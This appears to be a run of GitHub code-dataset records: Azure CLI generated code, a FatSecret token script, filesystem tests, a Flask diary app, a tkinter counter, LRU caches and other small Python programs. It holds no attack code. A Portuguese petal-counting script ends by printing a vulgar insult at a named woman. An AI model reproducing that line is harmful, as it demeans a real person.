\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{resourceName}/replicationFabrics/{fabricName}/replicationNetworks/{networkName}/replicationNetworkMappings/{networkMappingName}\",\n **self.url_parameters\n )\n\n @property\n def method(self):\n return \"PUT\"\n\n @property\n def error_format(self):\n return \"ODataV4Format\"\n\n @property\n def url_parameters(self):\n parameters = {\n **self.serialize_url_param(\n \"fabricName\", self.ctx.args.fabric_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"networkMappingName\", self.ctx.args.network_mapping_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"networkName\", self.ctx.args.network_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"resourceGroupName\", self.ctx.args.resource_group,\n required=True,\n ),\n **self.serialize_url_param(\n \"resourceName\", self.ctx.args.vault_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"subscriptionId\", self.ctx.subscription_id,\n required=True,\n ),\n }\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {\n **self.serialize_query_param(\n \"api-version\", \"2022-08-01\",\n required=True,\n ),\n }\n return parameters\n\n @property\n def header_parameters(self):\n parameters = {\n **self.serialize_header_param(\n \"Content-Type\", \"application/json\",\n ),\n **self.serialize_header_param(\n \"Accept\", \"application/json\",\n ),\n }\n return parameters\n\n @property\n def content(self):\n _content_value, _builder = self.new_content_builder(\n self.ctx.args,\n typ=AAZObjectType,\n typ_kwargs={\"flags\": {\"required\": True, \"client_flatten\": True}}\n )\n _builder.set_prop(\"properties\", AAZObjectType, \".\", typ_kwargs={\"flags\": {\"required\": True}})\n\n properties = _builder.get(\".properties\")\n if properties is not None:\n properties.set_prop(\"fabricSpecificDetails\", AAZObjectType, \".fabric_specific_details\")\n properties.set_prop(\"recoveryFabricName\", AAZStrType, \".recovery_fabric_name\")\n properties.set_prop(\"recoveryNetworkId\", AAZStrType, \".recovery_network_id\", typ_kwargs={\"flags\": {\"required\": True}})\n\n fabric_specific_details = _builder.get(\".properties.fabricSpecificDetails\")\n if fabric_specific_details is not None:\n fabric_specific_details.set_const(\"instanceType\", \"AzureToAzure\", AAZStrType, \".azure_to_azure\", typ_kwargs={\"flags\": {\"required\": True}})\n fabric_specific_details.set_const(\"instanceType\", \"VmmToAzure\", AAZStrType, \".vmm_to_azure\", typ_kwargs={\"flags\": {\"required\": True}})\n fabric_specific_details.discriminate_by(\"instanceType\", \"AzureToAzure\")\n fabric_specific_details.discriminate_by(\"instanceType\", \"VmmToAzure\")\n\n disc_azure_to_azure = _builder.get(\".properties.fabricSpecificDetails{instanceType:AzureToAzure}\")\n if disc_azure_to_azure is not None:\n disc_azure_to_azure.set_prop(\"primaryNetworkId\", AAZStrType, \".azure_to_azure.primary_network_id\", typ_kwargs={\"flags\": {\"required\": True}})\n\n disc_vmm_to_azure = _builder.get(\".properties.fabricSpecificDetails{instanceType:VmmToAzure}\")\n if disc_vmm_to_azure is not None:\n disc_vmm_to_azure.set_prop(\"location\", AAZStrType, \".vmm_to_azure.location\")\n\n return self.serialize_content(_content_value)\n\n def on_200(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var(\n \"instance\",\n data,\n schema_builder=self._build_schema_on_200\n )\n\n _schema_on_200 = None\n\n @classmethod\n def _build_schema_on_200(cls):\n if cls._schema_on_200 is not None:\n return cls._schema_on_200\n\n cls._schema_on_200 = AAZObjectType()\n\n _schema_on_200 = cls._schema_on_200\n _schema_on_200.id = AAZStrType(\n flags={\"read_only\": True},\n )\n _schema_on_200.location = AAZStrType()\n _schema_on_200.name = AAZStrType(\n flags={\"read_only\": True},\n )\n _schema_on_200.properties = AAZObjectType()\n _schema_on_200.type = AAZStrType(\n flags={\"read_only\": True},\n )\n\n properties = cls._schema_on_200.properties\n properties.fabric_specific_settings = AAZObjectType(\n serialized_name=\"fabricSpecificSettings\",\n )\n properties.primary_fabric_friendly_name = AAZStrType(\n serialized_name=\"primaryFabricFriendlyName\",\n )\n properties.primary_network_friendly_name = AAZStrType(\n serialized_name=\"primaryNetworkFriendlyName\",\n )\n properties.primary_network_id = AAZStrType(\n serialized_name=\"primaryNetworkId\",\n )\n properties.recovery_fabric_arm_id = AAZStrType(\n serialized_name=\"recoveryFabricArmId\",\n )\n properties.recovery_fabric_friendly_name = AAZStrType(\n serialized_name=\"recoveryFabricFriendlyName\",\n )\n properties.recovery_network_friendly_name = AAZStrType(\n serialized_name=\"recoveryNetworkFriendlyName\",\n )\n properties.recovery_network_id = AAZStrType(\n serialized_name=\"recoveryNetworkId\",\n )\n properties.state = AAZStrType()\n\n fabric_specific_settings = cls._schema_on_200.properties.fabric_specific_settings\n fabric_specific_settings.instance_type = AAZStrType(\n serialized_name=\"instanceType\",\n flags={\"required\": True},\n )\n\n disc_azure_to_azure = cls._schema_on_200.properties.fabric_specific_settings.discriminate_by(\"instance_type\", \"AzureToAzure\")\n disc_azure_to_azure.primary_fabric_location = AAZStrType(\n serialized_name=\"primaryFabricLocation\",\n )\n disc_azure_to_azure.recovery_fabric_location = AAZStrType(\n serialized_name=\"recoveryFabricLocation\",\n )\n\n disc_vmm_to_azure = cls._schema_on_200.properties.fabric_specific_settings.discriminate_by(\"instance_type\", \"VmmToAzure\")\n disc_vmm_to_azure.location = AAZStrType()\n\n return cls._schema_on_200\n\n\nclass _CreateHelper:\n \"\"\"Helper class for Create\"\"\"\n\n\n__all__ = [\"Create\"]\n","repo_name":"Azure/azure-cli-extensions","sub_path":"src/site-recovery/azext_site_recovery/aaz/latest/site_recovery/network/mapping/_create.py","file_name":"_create.py","file_ext":"py","file_size_in_byte":13040,"program_lang":"python","lang":"en","doc_type":"code","stars":350,"dataset":"github-code","pt":"5"} +{"seq_id":"13807666395","text":"#!/usr/bin/env python3\n\nimport fatsecret as fs\nimport argparse\nimport yaml\n\n\ndef get_secrets(config):\n conn = fs.Fatsecret(**config)\n # Invoke OAuth for authorization and store the token and secret\n print(\"\\n\\n ------ Authorize your web function ------ \\n\\n\")\n print(\"Follow this link and authorize your API key to access your data.\")\n print(conn.get_authorize_url())\n config['session_token'] = conn.authenticate(input(\"\\nPIN: \"))\n return config\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Authorize and store FatSecret user token')\n parser.add_argument(\n 'consumer_key', type=str, help='FatSecret API Consumer Key')\n parser.add_argument(\n 'consumer_secret', type=str, help='FatSecret REST API Shared Secret')\n parser.add_argument(\n '--file',\n default='fs_credentials.yml',\n type=argparse.FileType('w'),\n help='credential storage file')\n args = parser.parse_args()\n config = {\n 'consumer_key': args.consumer_key,\n 'consumer_secret': args.consumer_secret\n }\n config = get_secrets(config)\n yaml.dump(config, args.file)\n","repo_name":"Cerebus/withings_fatsecret","sub_path":"store_keys.py","file_name":"store_keys.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"21130830750","text":"import logging\nfrom unittest import mock\n\nfrom constants import BLOCK_HEADER_SIZE_BYTES, BLOCK_SIZE_BYTES\nfrom fs.commands.close import CloseCommand\nfrom fs.commands.create import CreateCommand\nfrom fs.commands.link import LinkCommand\nfrom fs.commands.ls import LsCommand\nfrom fs.commands.open import OpenCommand\nfrom fs.commands.truncate import TruncateCommand\nfrom fs.commands.unlink import UnlinkCommand\nfrom fs.commands.write import WriteCommand\nfrom fs.driver.utils import form_header_from_bytes\nfrom tests.conftest import LOREM_IPSUM, FSBaseMountAndMkfsTestCase\n\n\nclass TestFSLab2(FSBaseMountAndMkfsTestCase):\n def test_create_file(self) -> None:\n filename = \"file1\"\n command = CreateCommand(path=filename)\n command.exec()\n\n resolved_path = command.resolve_path(filename)\n\n self.assertTrue(\n resolved_path.fs_object_path\n in command._system_state.get_path_to_descriptor_mapping()\n )\n self.get_file_descriptor(command, resolved_path.fs_object_path)\n\n def test_create_n_files(self) -> None:\n for i in range(5):\n filename = f\"file_{i}\"\n command = CreateCommand(path=filename)\n command.exec()\n\n resolved_path = command.resolve_path(filename)\n\n self.get_file_descriptor(command, resolved_path.fs_object_path)\n\n def test_ls_files(self) -> None:\n created_files = []\n\n for i in range(5):\n filename = f\"file_{i}\"\n\n CreateCommand(path=filename).exec()\n created_files.append(filename)\n\n command = LsCommand()\n\n with self._caplog.at_level(logging.INFO):\n command.exec()\n\n command_output = self._caplog.records[0].msg\n file_rows = [row for row in command_output.split(\"\\n\")[5:]]\n\n for i, file in enumerate(created_files):\n self.assertIn(file, file_rows[i])\n\n def test_link_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n link_filename = \"file1_link\"\n command = LinkCommand(path1=filename, path2=link_filename)\n command.exec()\n\n resolved_path = command.resolve_path(filename)\n file = self.get_file_descriptor(command, resolved_path.fs_object_path)\n\n link_resolved_path = command.resolve_path(filename)\n file_link = self.get_file_descriptor(command, link_resolved_path.fs_object_path)\n\n self.assertEqual(file.n, file_link.n)\n self.assertEqual(file.refs_count, 2)\n\n def test_unlink_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n link_filename = \"file1_link\"\n LinkCommand(path1=filename, path2=link_filename).exec()\n\n command = UnlinkCommand(path=link_filename)\n command.exec()\n\n link_resolved_path = command.resolve_path(link_filename)\n\n self.assertTrue(\n link_resolved_path.fs_object_path\n not in command._system_state.get_path_to_descriptor_mapping()\n )\n\n resolved_path = command.resolve_path(filename)\n\n file = self.get_file_descriptor(command, resolved_path.fs_object_path)\n self.assertEqual(file.refs_count, 1)\n\n def test_delete_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n command = UnlinkCommand(path=filename)\n resolved_path = command.resolve_path(filename)\n\n file_descriptor = command._system_state.get_descriptor_id(\n resolved_path.fs_object_path\n )\n self.assertIsNotNone(file_descriptor)\n\n file_descriptor_blocks = command._system_state.get_descriptor_blocks(\n file_descriptor\n )\n\n command.exec()\n\n file = command._memory_proxy.get_descriptor(\n file_descriptor, file_descriptor_blocks\n )\n\n self.assertEqual(file.refs_count, 0)\n\n with command._memory_proxy.memory as m:\n for block in file.blocks:\n m.seek(block.n * BLOCK_SIZE_BYTES)\n header_bytes = m.read(BLOCK_HEADER_SIZE_BYTES)\n\n header = form_header_from_bytes(header_bytes)\n\n self.assertFalse(header.used)\n self.assertEqual(header.ref_count, 0)\n\n def test_open_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n command = OpenCommand(path=filename)\n\n test_fd = 100\n\n # For getting predictable `fd` we should mock `random.randint` result.\n with mock.patch(\"random.randint\", lambda _x, _y: test_fd):\n command.exec()\n\n self.assertTrue(str(test_fd) in command._system_state.get_fd_to_path_mapping())\n\n resolved_path = command.resolve_path(filename)\n file = self.get_file_descriptor(command, resolved_path.fs_object_path)\n self.assertTrue(file.opened)\n\n def test_close_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n test_fd = 100\n\n # For getting predictable `fd` we should mock `random.randint` result.\n with mock.patch(\"random.randint\", lambda _x, _y: test_fd):\n OpenCommand(path=filename).exec()\n\n command = CloseCommand(fd=str(test_fd))\n command.exec()\n\n resolved_path = command.resolve_path(filename)\n file = self.get_file_descriptor(command, resolved_path.fs_object_path)\n self.assertFalse(file.opened)\n\n def test_write_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n test_fd = 100\n\n # For getting predictable `fd` we should mock `random.randint` result.\n with mock.patch(\"random.randint\", lambda _x, _y: test_fd):\n OpenCommand(path=filename).exec()\n\n test_content = \"hello_world\"\n\n command = WriteCommand(fd=str(test_fd), offset=0, content=test_content)\n command.exec()\n\n resolved_path = command.resolve_path(filename)\n file = self.get_file_descriptor(command, resolved_path.fs_object_path)\n self.assertEqual(file.size, len(test_content))\n\n content = file.read_content(len(test_content), offset=0)\n self.assertEqual(content, test_content)\n\n def test_write_large_data_to_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n test_fd = 100\n\n # For getting predictable `fd` we should mock `random.randint` result.\n with mock.patch(\"random.randint\", lambda _x, _y: test_fd):\n OpenCommand(path=filename).exec()\n\n command = WriteCommand(fd=str(test_fd), offset=3, content=LOREM_IPSUM)\n command.exec()\n\n resolved_path = command.resolve_path(filename)\n file = self.get_file_descriptor(command, resolved_path.fs_object_path)\n\n self.assertEqual(file.size, len(LOREM_IPSUM))\n\n content = file.read_content(len(LOREM_IPSUM), offset=3)\n self.assertEqual(content, LOREM_IPSUM)\n\n def test_truncate_size_down_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n test_fd = 100\n\n # For getting predictable `fd` we should mock `random.randint` result.\n with mock.patch(\"random.randint\", lambda _x, _y: test_fd):\n OpenCommand(path=filename).exec()\n\n WriteCommand(fd=str(test_fd), offset=0, content=LOREM_IPSUM).exec()\n\n test_truncate_size = len(LOREM_IPSUM) // 2\n\n command = TruncateCommand(path=filename, size=test_truncate_size)\n command.exec()\n\n resolved_path = command.resolve_path(filename)\n file = self.get_file_descriptor(command, resolved_path.fs_object_path)\n\n content = file.read_content(file.size, offset=0)\n self.assertEqual(content, LOREM_IPSUM[:test_truncate_size])\n\n def test_truncate_size_up_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n test_fd = 100\n\n # For getting predictable `fd` we should mock `random.randint` result.\n with mock.patch(\"random.randint\", lambda _x, _y: test_fd):\n OpenCommand(path=filename).exec()\n\n WriteCommand(fd=str(test_fd), offset=0, content=LOREM_IPSUM).exec()\n\n test_truncate_size = len(LOREM_IPSUM) * 2\n\n command = TruncateCommand(path=filename, size=test_truncate_size)\n command.exec()\n\n resolved_path = command.resolve_path(filename)\n file = self.get_file_descriptor(command, resolved_path.fs_object_path)\n\n self.assertEqual(file.size, len(LOREM_IPSUM))\n","repo_name":"n4mespace/labFileSystem","sub_path":"tests/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":8547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"31810684981","text":"\nn_petalas = int(input('Indique o número de pétalas: '))\n\nbem_ou_mal = input('escolhe entre [B]em me quer ou [M]al me quer: ')\n\nif bem_ou_mal == 'B':\n b= n_petalas % 2 == 0\n if b == True: \n print('Mal me quer')\n elif b == False:\n print('Bem me quer')\n\nelif bem_ou_mal == 'M':\n c = n_petalas % 2 == 0\n if c == True: \n print('Bem me quer')\n elif c == False:\n print('Mal me quer')\n\n\nprint(\"Sara é uma filha da puta.\")\n\n","repo_name":"MarceloBrunerWeber/Python","sub_path":"CursoUdemy/Exercícios/tarefinha_do_citrix2.py","file_name":"tarefinha_do_citrix2.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36035999693","text":"\nclass Node:\n \"\"\"\n Node class with value and parent\n \"\"\"\n def __init__(self, value, parent=None):\n self.value = value\n self.parent = parent\n\n\n\ndef lca(node1, node2):\n \"\"\"\n The complexity of the solution is\n Time: O(N), where N is the total number of nodes present in the tree. We are traversing the tree two times.\n 2*N in total so the complexity is linear and checking if a item is present in the set is constant time.\n\n Space: O(N), where N is the total number of nodes. We are storing the node values in a set to check for\n presence in the next traversal.\n\n :param node1: one node\n :param node2: another node\n :return:\n \"\"\"\n # traverse first node and store its parents\n path = set()\n while node1!=None:\n path.add(node1.value)\n node1 = node1.parent\n\n # traverse node 2 and if any parent match from the previous parents set then this is lca\n while node2!=None:\n if node2.value in path:\n break\n else:\n node2 = node2.parent\n\n print(f\"LCA {node2.value}\")\n","repo_name":"Mushahid2521/BongoWrittenTest","sub_path":"Q3_least_common_ancestor/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38327597431","text":"import numpy as np\r\n\r\n\r\nclass DensityDetector():\r\n def __init__(self):\r\n self.group_num = 5\r\n self.depth_coeff = 1\r\n\r\n def convertVector(self, pos_list):\r\n # [top, left, bottom, right]\r\n num_vector = len(pos_list)\r\n if num_vector == 0:\r\n return False\r\n pos_list = np.array(pos_list)\r\n\r\n pos_vector = np.zeros((num_vector, 5))\r\n # x position\r\n pos_vector[:, 0] = (pos_list[:, 1] + pos_list[:, 3]) / 2\r\n # y position\r\n pos_vector[:, 1] = (pos_list[:, 0] + pos_list[:, 2]) / 2\r\n # width\r\n pos_vector[:, 2] = abs(pos_list[:, 3] - pos_list[:, 1])\r\n # height\r\n for i in range(num_vector):\r\n pos_vector[i, 3] = abs(pos_list[i, 2] - pos_list[i, 0])\r\n if pos_vector[i, 3] < pos_vector[i, 2]:\r\n pos_vector[i, 3] = 4 * pos_vector[i, 2]\r\n # area\r\n pos_vector[i, 4] = pos_vector[i, 2] * pos_vector[i, 3]\r\n return pos_vector\r\n\r\n\r\n def groupDepth(self, area_dict):\r\n main_list = []\r\n main_list_range = []\r\n # dict {area: area_range}\r\n area_range = [[a*0.5, a*2] for a in area_dict.values()]\r\n area_range = dict(zip(area_dict.keys(), area_range))\r\n for key in area_dict:\r\n need_flag = True\r\n if main_list == []:\r\n main_list.append([key])\r\n main_list_range.append(area_range[key])\r\n else:\r\n for i, range in enumerate(main_list_range):\r\n if area_dict[key] > min(range) and area_dict[key] < max(range):\r\n main_list[i].append(key)\r\n main_list_range[i].append(area_range[key][0])\r\n main_list_range[i].append(area_range[key][1])\r\n need_flag = False\r\n else:\r\n continue\r\n if need_flag:\r\n main_list.append([key])\r\n main_list_range.append(area_range[key])\r\n return main_list\r\n\r\n\r\n def getGroup(self, x_dict, w_dict):\r\n main_list = []\r\n main_list_range = []\r\n dis_range = {}\r\n for key in x_dict:\r\n dis_range[key] = [x_dict[key]-w_dict[key], x_dict[key]+w_dict[key]]\r\n \r\n \r\n for key in x_dict:\r\n need_flag = True\r\n if main_list == []:\r\n main_list.append([key])\r\n main_list_range.append(dis_range[key])\r\n else:\r\n for i, range in enumerate(main_list_range):\r\n if x_dict[key] > min(range) and x_dict[key] < max(range):\r\n main_list[i].append(key)\r\n main_list_range[i].append(dis_range[key][0])\r\n main_list_range[i].append(dis_range[key][1])\r\n need_flag = False\r\n else:\r\n continue\r\n if need_flag:\r\n main_list.append([key])\r\n main_list_range.append(dis_range[key])\r\n return main_list\r\n\r\n \r\n def checkDensity(self, pos_list):\r\n vector_num = len(pos_list)\r\n pos_vector = self.convertVector(pos_list)\r\n area_list = (pos_vector[:, 4]).tolist()\r\n area_dict = dict(zip([i for i in range(vector_num)], area_list))\r\n area_dict = {k: v for k, v in sorted(area_dict.items(), key=lambda item: item[1])}\r\n depth_list = self.groupDepth(area_dict)\r\n \r\n main_list = []\r\n for depth_block in depth_list:\r\n temp_x_list = [pos_vector[i, 0] for i in depth_block]\r\n temp_x_dict = dict(zip(depth_block, temp_x_list))\r\n temp_x_dict = {k: v for k, v in sorted(temp_x_dict.items(), key=lambda item: item[1])}\r\n temp_w_list = [pos_vector[i, 2] for i in depth_block]\r\n temp_w_dict = dict(zip(depth_block, temp_w_list))\r\n temp_block_list = self.getGroup(temp_x_dict, temp_w_dict)\r\n for block in temp_block_list:\r\n main_list.append(block)\r\n return main_list\r\n \r\n\r\nif __name__ == \"__main__\":\r\n demo_list = np.array([[20, 70, 90, 90], [19, 71, 90, 90], [5, 10, 10, 13]])\r\n demo = DensityDetector()\r\n dense_list = demo.checkDensity(demo_list)","repo_name":"jiangshaoqi/Esp32imgCap","sub_path":"peopledense.py","file_name":"peopledense.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35657180444","text":"import tkinter as tk\nimport time\n\nroot = tk.Tk()\n\nroot.title(\"Dukelska K.B.\")\nroot.geometry(\"680x560\")\n\nCounter = tk.IntVar()\nCounter.set(0)\nState = False\nM = 13\nN = 66\n\nlbl1 = tk.Label(root, text=\"State = {} \".format(State), font=(\"Arial\", 14))\nlbl1.grid(row=3, column=1)\nlabel1 = tk.Label(root, text='Counter={}'.format(Counter.get()), font=(\"Arial\", 14))\nlabel1.grid(row=1, column=1)\nlabel2 = tk.Label(root, text='Enter number M', font=(\"Arial\", 14))\nlabel2.grid(row=4, column=1)\n\ntxt = tk.Entry(root, width=20)\ntxt.grid(row=5, column=1)\n\nres = \"{}\".format(txt.get())\n\n\ndef entry(str):\n global M\n global Counter\n current_time = time.strftime(\"%H:%M:%S\")\n if txt.get().isdigit():\n listbox.insert(tk.END, f\"Set to {txt.get()} with Entry at {current_time}\")\n M=int(txt.get())\n if int(txt.get())<=Counter.get():\n label1.config(bg='red')\n else:\n label1.config(bg='white')\n\n\ntxt.bind(\"\", entry)\n\n\ndef clicked():\n global Counter\n global N\n global M\n if Counter.get() < N:\n Counter.set(Counter.get() + 1)\n current_time = time.strftime(\"%H:%M:%S\")\n listbox.insert(tk.END, f\"Grow with button on 1, current: {Counter.get()} at {current_time}\")\n else:\n Counter.set(Counter.get() + 0)\n label1.config(bg='white')\n if Counter.get() >= M:\n label1.config(bg='red')\n else:\n label1.config(bg='white')\n label1.config(text='Counter={}'.format(Counter.get()))\n\n global State\n State = not State\n lbl1.config(text='State= {}'.format(State))\n\n\nscal = tk.Scale(root, orient=tk.HORIZONTAL, length=300, from_=0, to=N, tickinterval=4, resolution=4)\nscal.grid(row=3, column=1)\n\n\ndef scalFunc(str):\n global Counter\n Counter.set(scal.get())\n current_time = time.strftime(\"%H:%M:%S\")\n listbox.insert(tk.END, f\"Grow up with scal, current: {Counter.get()} at {current_time}\")\n label1.config(text='Counter={}'.format(Counter.get()))\n if scal.get() >= M:\n label1.config(bg='red')\n else:\n label1.config(bg='white')\n \n\n\nscal.bind(\"\", scalFunc)\n\n\nbtn = tk.Button(root, text='Grow', bg='red',font=(\"Arial Bold\", 14), command=clicked)\nbtn.grid(row=2, column=1)\n\nlabel3 = tk.Label(root, text='Events', font=(\"Arial\", 14))\nlabel3.grid(row=6, column=1)\nlistbox = tk.Listbox(root, width=50, height=20)\nlistbox.grid(row=7, column=1)\n\n\nroot.mainloop()\n","repo_name":"KseniiaDukelska/smart-house","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29105647978","text":"from flask import Blueprint, render_template, request, flash, redirect, url_for\nfrom flask_login import login_required, current_user\n\nfrom app import db\nfrom app.models.diaries import Diary\nfrom app.views.users import login_manager\n\nlogin_manager.login_view = 'users.login'\n\ndiary_blueprint = Blueprint('diaries', __name__)\n\n\n@diary_blueprint.route('/')\n@login_required\ndef index():\n user_id = current_user.get_id()\n diaries = Diary.query.filter_by(user_id=user_id).order_by(Diary.created_date.desc()).all()\n\n return render_template('diaries/index.html', diaries=diaries)\n\n\n@diary_blueprint.route('/add', methods=['GET', 'POST'])\n@login_required\ndef add_diary():\n if request.method == 'POST' and 'title' in request.form:\n user_id = current_user.get_id()\n title = request.form.get('title')\n description = request.form.get('description')\n link = request.form.get('link')\n diary = add_diary_to_db(user_id, title, description, link)\n\n flash(f'Diary entry \\\"{diary.title}\\\" added')\n\n return redirect(url_for('diaries.index'))\n\n return render_template('diaries/add.html')\n\n\n@diary_blueprint.route('/edit/', methods=['GET', 'POST'])\n@login_required\ndef edit_diary(diary_id):\n diary = load_diary(diary_id)\n if request.method == 'POST':\n diary.title = request.form.get('title')\n diary.description = request.form.get('description')\n diary.link = request.form.get('link')\n db.session.commit()\n flash(f'Diary entry \\\"{diary.title}\\\" updated')\n\n return redirect(url_for('diaries.index'))\n\n return render_template('diaries/edit.html', diary=diary)\n\n\n@diary_blueprint.route('/delete/', methods=['GET', 'POST'])\n@login_required\ndef delete_diary(diary_id):\n diary = load_diary(diary_id)\n db.session.delete(diary)\n db.session.commit()\n flash(f'Diary entry \\\"{diary.title}\\\" deleted')\n\n return redirect(url_for('diaries.index'))\n\n\ndef add_diary_to_db(user_id, title, description, link):\n # noinspection PyArgumentList\n diary = Diary(user_id=user_id, title=title, description=description, link=link)\n db.session.add(diary)\n db.session.commit()\n\n return diary\n\n\ndef load_diary(diary_id):\n diary = Diary.query.filter_by(id=diary_id).first()\n\n return diary\n","repo_name":"Joeriksson/flask-code-diary","sub_path":"app/views/diaries.py","file_name":"diaries.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24531886515","text":"import csv\nimport sys\n\n# Vivian Cheng, 10-301 HW1 Programming: Decision Stump\n\ndef get_counts(i, review, vocab, feat_vec, label_dict, feature_flag): # fill counts\n label, all_words = review.split(\"\\t\")\n words = all_words.split(\" \")\n label_dict[i] = label\n for word in words: # skip label\n if vocab.get(word) or vocab.get(word) == 0:\n dict_index = vocab[word] # index of word in dictionary \n if feature_flag == '1':\n feat_vec[i][dict_index] = 1\n else:\n feat_vec[i][dict_index] = feat_vec[i].get(dict_index, 0) + 1\n\n\n\ndef fill_dict(dict):\n vocab = {}\n for d in dict:\n word, id = d.split()\n word, id = word.strip(), id.strip()\n vocab[word] = int(id)\n return vocab\n\ndef print_counts(feat_vec, label_dict, outfile):\n f = open(outfile, 'w')\n for i in range(len(feat_vec)):\n if feat_vec[i] == {}: continue \n f.write(\"%s\\t\" % label_dict[i])\n k = 0\n for key, value in feat_vec[i].items():\n f.write('%s:%s' % (key, value))\n k += 1\n if k < len(feat_vec[i]):\n f.write(\"\\t\")\n f.write(\"\\n\")\n f.close()\n\n\ndef filter_model_2(feat_vec):\n for i in range(len(feat_vec)):\n for key, value in list(feat_vec[i].items()):\n if value >= 4:\n del feat_vec[i][key]\n else:\n feat_vec[i][key] = 1\n return feat_vec\n\n\n## Opens up csv file\ndef main(): \n (program, trn_in, valid_in, test_in, dict_in, ftrn_out, fvalid_out, ftest_out, feature_flag) = sys.argv\n # Parse dict \n d = open(dict_in)\n vocab = fill_dict(d)\n # Parse movie reviews \n files = [(trn_in, ftrn_out), (valid_in, fvalid_out), (test_in, ftest_out)]\n for (in_file, out_file) in files:\n # Parse movie reviews \n feat_vec = {}\n label_dict= {}\n reviews = open(in_file, 'r')\n if feature_flag == '1':\n i = 0\n for review in reviews:\n feat_vec[i] = {} # initialize \n get_counts(i, review, vocab, feat_vec, label_dict, feature_flag)\n i += 1 \n print_counts(feat_vec, label_dict, out_file)\n #remove_tab(out_file)\n elif feature_flag == '2':\n i = 0\n for review in reviews:\n feat_vec[i] = {}\n get_counts(i, review, vocab, feat_vec, label_dict, feature_flag)\n i += 1\n feat_vec = filter_model_2(feat_vec)\n print_counts(feat_vec, label_dict, out_file)\n #remove_tab(out_file)\n\n\n# def remove_tab(out_file):\n# with open(out_file) as file:\n# for line in file:\n# line = line.lstrip()\n\nif __name__ == \"__main__\":\n main()","repo_name":"vccheng2001/MachineLearningAlgorithms","sub_path":"LogisticRegression/feature.py","file_name":"feature.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33665609448","text":"class ListNode:\n def __init__(self, key=None, value=None):\n self.key = key\n self.value = value\n self.prev = None\n self.next = None\n\n\nclass LRUCache:\n def __init__(self, capacity: int):\n self.capacity = capacity\n self.hashmap = {}\n # 新建两个节点 head 和 tail\n self.head = ListNode()\n self.tail = ListNode()\n # 初始化链表为 head <-> tail\n self.head.next = self.tail\n self.tail.prev = self.head\n\n # 因为get与put操作都可能需要将双向链表中的某个节点移到末尾,所以定义一个方法\n def move_node_to_tail(self, key):\n # 先将哈希表key指向的节点拎出来,为了简洁起名node\n # hashmap[key] hashmap[key]\n # | |\n # V --> V\n # prev <-> node <-> next pre <-> next ... node\n node = self.hashmap[key]\n node.prev.next = node.next\n node.next.prev = node.prev\n # 之后将node插入到尾节点前\n # hashmap[key] hashmap[key]\n # | |\n # V --> V\n # prev <-> tail ... node prev <-> node <-> tail\n node.prev = self.tail.prev\n node.next = self.tail\n self.tail.prev.next = node\n self.tail.prev = node\n\n def get(self, key: int) -> int:\n if key in self.hashmap:\n # 如果已经在链表中了久把它移到末尾(变成最新访问的)\n self.move_node_to_tail(key)\n res = self.hashmap.get(key, -1)\n if res == -1:\n return res\n else:\n return res.value\n\n def put(self, key: int, value: int) -> None:\n if key in self.hashmap:\n # 如果key本身已经在哈希表中了就不需要在链表中加入新的节点\n # 但是需要更新字典该值对应节点的value\n self.hashmap[key].value = value\n # 之后将该节点移到末尾\n self.move_node_to_tail(key)\n else:\n if len(self.hashmap) == self.capacity:\n # 去掉哈希表对应项\n self.hashmap.pop(self.head.next.key)\n # 去掉最久没有被访问过的节点,即头节点之后的节点\n self.head.next = self.head.next.next\n self.head.next.prev = self.head\n # 如果不在的话就插入到尾节点前\n new = ListNode(key, value)\n self.hashmap[key] = new\n new.prev = self.tail.prev\n new.next = self.tail\n self.tail.prev.next = new\n self.tail.prev = new\n\n\n\nclass DLinkedNode:\n \"\"\"\n 双链表节点\n \"\"\"\n def __init__(self, key: int = 0, value: int = 0):\n self.prev = None\n self.next = None\n self.key = key\n self.value = value\n \nclass LRUCache:\n \n def __init__(self, capacity: int):\n self.size = 0\n self.capacity = capacity\n self.cache = dict()\n self.head = DLinkedNode()\n self.tail = DLinkedNode()\n self.head.next = self.tail\n self.tail.prev = self.head\n \n def get(self, key: int) -> int:\n # 如果key不在cache中, 直接返回-1\n if key not in self.cache:\n return -1\n \n # 从cache中获取key对应的节点\n node = self.cache[key]\n # 移动节点到链表的头部\n self.move_to_head(node)\n # 返回节点的值\n return 